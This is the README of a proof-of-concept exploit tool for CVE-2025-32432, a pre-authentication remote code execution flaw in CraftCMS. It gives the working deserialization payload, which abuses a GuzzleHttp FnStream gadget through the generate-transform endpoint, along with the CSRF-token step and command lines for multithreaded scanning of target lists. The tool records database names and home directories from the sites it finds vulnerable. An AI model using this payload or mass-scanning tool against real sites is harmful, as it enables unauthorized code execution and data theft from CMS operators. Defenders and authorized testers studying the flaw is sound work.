# CraftCMS CVE-2025-32432 Exploit By Chirag Artani

## Overview

This repository contains a proof-of-concept exploit script for CVE-2025-32432, a pre-authentication Remote Code Execution (RCE) vulnerability affecting CraftCMS versions 4.x and 5.x. The vulnerability exists in the asset transform generation feature of CraftCMS.

This exploit script automates the detection and verification of the vulnerability by:

1. Extracting CSRF tokens from the CraftCMS admin dashboard
2. Exploiting the vulnerability through PHP object injection
3. Verifying successful exploitation by extracting system information

## Disclaimer

⚠️ **This tool is provided for educational and authorized security testing purposes only.** 

Only use this tool against systems you have explicit permission to test. Unauthorized testing against systems without permission is illegal and unethical.

## Features

- Support for both single target and multiple target (file-based) scanning
- Multi-threading capability for faster scanning of multiple targets
- Detailed output including database name and home directory information
- CSV report generation for vulnerable targets
- SSL verification bypass for testing with self-signed certificates
- Robust error handling

## Installation

```bash
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432

# Install required dependencies
pip install -r requirements.txt
```

## Requirements

- Python 3.6+
- Required Python packages (see requirements.txt):
  - requests
  - beautifulsoup4
  - urllib3

## Usage

### Single Target

To scan a single target:

```bash
python3 craftcms_rce.py -u example.com
```

### Multiple Targets

To scan multiple targets from a file (one URL per line):

```bash
python3 craftcms_rce.py -f urls.txt -t 10
```

Where `-t` specifies the number of threads to use (default is 5).

### Options

```
-u, --url     Single URL to test
-f, --file    File containing URLs to test (one per line)
-t, --threads Number of threads (default: 5)
-h, --help    Show help message and exit
```

## Output

The script will output results to the console and save vulnerable targets to `vulnerable.txt` in CSV format with the following columns:

- URL
- CRAFT_DB_DATABASE value (database name)
- HOME directory path
- Other system information

Example console output:

```
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
    CRAFT_DB_DATABASE: example_db
    HOME Directory: /home/example

=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt
```

## How the Vulnerability Works

This vulnerability exploits a deserialization issue in CraftCMS. The exploit:

1. Makes a GET request to `/index.php?p=admin/dashboard` to retrieve a CSRF token
2. Sends a POST request to `/index.php?p=admin/actions/assets/generate-transform` with a specially crafted JSON payload
3. The payload includes a PHP object that gets deserialized, leading to arbitrary code execution through the `GuzzleHttp\Psr7\FnStream` class
4. The successful exploitation is verified by executing `phpinfo()` and extracting specific system information

## Technical Details

The exploit takes advantage of an insecure deserialization in the asset transform generation process. The vulnerable code path allows an attacker to inject a custom PHP object that gets unserialized, leading to arbitrary code execution.

The key components of the payload:

```json
{
  "assetId": 11,
  "handle": {
    "width": 123,
    "height": 123,
    "as session": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "GuzzleHttp\\Psr7\\FnStream",
      "__construct()": [[]],
      "_fn_close": "phpinfo"
    }
  }
}
```

## Contributing

Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](https://github.com/yourusername/craftcms-cve-2025-32432/issues).

## License

This project is licensed under the MIT License - see the LICENSE file for details.

## References

- [CVE-2025-32432 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32432)
- [CraftCMS Security Advisory](https://craftcms.com/knowledge-base/security-advisories)

## Author

- Nicolas Bourras (Orange Cyberdefense) - Original vulnerability discovery
- [Chirag Artani](https://3rag.com) - Exploit script author
